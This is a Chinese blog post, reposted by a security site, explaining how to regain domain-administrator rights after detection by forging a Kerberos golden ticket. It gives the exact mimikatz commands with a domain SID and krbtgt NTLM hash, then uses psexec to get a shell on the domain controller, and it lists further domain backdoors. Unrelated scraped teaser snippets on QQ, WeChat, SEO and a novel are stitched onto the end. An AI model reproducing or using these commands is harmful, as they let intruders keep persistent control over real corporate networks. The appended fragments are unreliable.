最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。
我原来发过一个微博说
这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:
要重新拿回域管理员权限,首先要先知道域内的管理员有谁
我这里的实验环境,通过截图可以看到域管理员是administrator
我还要知道域SID是啥
我的域SID是
还有最重要的krbtgt用户的ntlm哈希,我原来导出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::
然后该用神器mimikatz出场了,依次执行
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
到现在,我们又重新拥有域管理员权限了,可以验证下
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。
当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。
【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】
本文导读目录: 1、qq群文件黑客能删除吗 2、只在QQ群里聊天会电脑会被入侵吗? 3、QQ群匿名会不会被查到是谁 4、qq群匿名可以查出来么 5、qq群的聊天记录会被网警监控吗?...
看了喜宝以后,很多人对她是爱恨交加的,她嘴边说挑选化学物质,但最后也是为了爱奋不顾身,人终究还是期盼独一无二的感情的。有关喜宝你有什么体会呢?下边我产生:看了《喜宝》以后微信发朋友圈体会说说 看过《...
本文导读目录: 1、15年前,那个黑掉阿里内网的“黑客男孩”吴翰清,如今情况怎样? 2、年仅10岁的天才“黑客”:因不想写作业而黑掉学校网站,他现状如何呢? 3、中国年龄最小的黑客汪正扬:曾黑...
到目前为止,小编认为SEO已经跨越了很多次。目前,是用户体验的时代。如果你想做好SEO,也就是说,如果你想有一个好的排名,你必须从用户体验出发,做好网站的每一个细节,这样才能留住用户,留住用户,你的排...
微信转账记录回复方法:方法一:可以点击微信支付公众号,根据时间找回误删的微信交易记录。但是如果你没有关注微信支付这个公众号的话,那也就没有记录了; 微信导出聊天记录?目前微信的用户经达到了10亿之多,...
序言怎么写(序言是什么意思) 如何去写序言? 很百思特网多人在读书籍文章的时候只注重书籍文章的正文,却不注重文章的序言、后记等。其实文章的序言往往会写涉及作者写作的缘由,概括主要的内容以及阅读...